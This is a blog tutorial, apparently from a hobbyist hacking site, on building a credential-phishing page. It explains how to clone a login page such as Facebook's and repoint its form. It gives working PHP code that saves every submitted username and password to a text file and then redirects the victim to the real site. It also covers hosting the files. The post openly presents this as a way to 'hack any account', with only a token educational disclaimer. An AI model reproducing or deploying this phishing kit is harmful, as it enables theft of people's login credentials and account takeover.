How To Create own Phishing Page Step By Guide

Phishing is the best way to hack any account and Phishing is the common attack , any one with a phishing page can easily hack accounts if...

Phishing is the best way to hack any account and Phishing is the common attack , any one with a phishing page can easily hack accounts if your victim is enough foolish


In this tutorial am gonna teach you how to create your own Phishing pages for your desired websites , this tutorial is very easy but you must have some patient with little skills to do


As you know phishing requires some coding knowledge such as HTML, CSS, JavaScript and little PHP , if you don't have any idea about it then its very difficult to create your own Phishing Page
If you have at least the basics of HTML then follow this tutorial to create your own Phishing page else leave this tutorial its not for you

How To Create Phishing Page Step By Guide

In order To create your own phishing page you have to find your target website , I mean you have to get the website's login portal

Mostly people search for How To create phishing page for Facebook , in Facebook the login portal is visible in the main page so here you need not to find out the login page

Here am Not Confusing you by writing too much

If you want to create phishing page for a particular website then open the website in a good web browser such as chrome

If you want to create phishing page for Facebook then open facebook.com

Then right click on mouse you will see a Option view source code then click on it

Or you can directly press CTRL+U to see the source code

Most of the people search for How To Create Your phishing page with android Mobile , there is no Source code viewer option so how to do

to view source code of any website you can search for online source code viewers

But in android you can type view-source:
In front of url to see the source code
Eg:

View-Source:www.facebook.com


Now Copy all the Source code starting from <html> to the end tag of </html>

Now open Notepad and paste the copied codes

Now find the tag <form action="

And replace login.php in action

Eg:

<form action="login.php"
Now save the file as index.html
In android you can use droid edit app to edit html files
copy below code and save it as
login.php
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("users.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

You can change facebook.com with any url

Now create another file

Don't write anything just save as users.txt

Now you have all Done

Just upload all the files ( index.html, login.php and users.txt )to a free web hosting server and make sure you give chmod 777 permission to users.text file

Finally This tutorial is only for educational purpose , we are not responsible for any misuse

Incoming Search Terms:



how to create phishing page in android
how to create phishing page with android phone
how to make advanced phishing page

COMMENTS

Name

adblocker,1,adobe,1,AI,1,android,14,anti adblocker,1,aritificial intelligence,1,best hosting,1,block adblock,1,busybox,1,commands,4,crack,9,cross-platform,1,csit,1,Download,2,edu email,1,facebook,4,fifa,1,flutter,1,free mastercard,1,game,1,google drive,1,HACK,5,hacking,7,how to remove community strike,1,instagram,1,ios,1,kali linux,1,linux,8,mastercard,1,microsoft,1,mod apk,3,nepali unicode,1,Notes,2,old question,1,payoneer,1,phising,1,programming,4,PUBG,3,PUBG HACK,1,root,1,strike removal,1,Tech,5,terminal,3,termux,1,Tricks,29,virus,1,windows,11,youtbe,1,youtube,2,
ltr
item
SIDTUBE: How To Create own Phishing Page Step By Guide
How To Create own Phishing Page Step By Guide
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvEgJ3aQBUxKCvrApusOg2Mrz1L1hXiPgCHBsyZ4kcjpwdog3j7SVfnsyhxvMaAzww2yIo2Kqj_VFfq1griIBKbhO50aDkZQLo1Q9YSvgTxXwcULiGQZEpj2BiZrWz7XsymAFQupSfD0rF/s1600/download+%25281%2529.jpeg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvEgJ3aQBUxKCvrApusOg2Mrz1L1hXiPgCHBsyZ4kcjpwdog3j7SVfnsyhxvMaAzww2yIo2Kqj_VFfq1griIBKbhO50aDkZQLo1Q9YSvgTxXwcULiGQZEpj2BiZrWz7XsymAFQupSfD0rF/s72-c/download+%25281%2529.jpeg
SIDTUBE
https://www.siddharthajoshi.com.np/2020/02/how-to-create-own-phishing-page-step-by.html
https://www.siddharthajoshi.com.np/
https://www.siddharthajoshi.com.np/
https://www.siddharthajoshi.com.np/2020/02/how-to-create-own-phishing-page-step-by.html
true
8327815029698999663
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content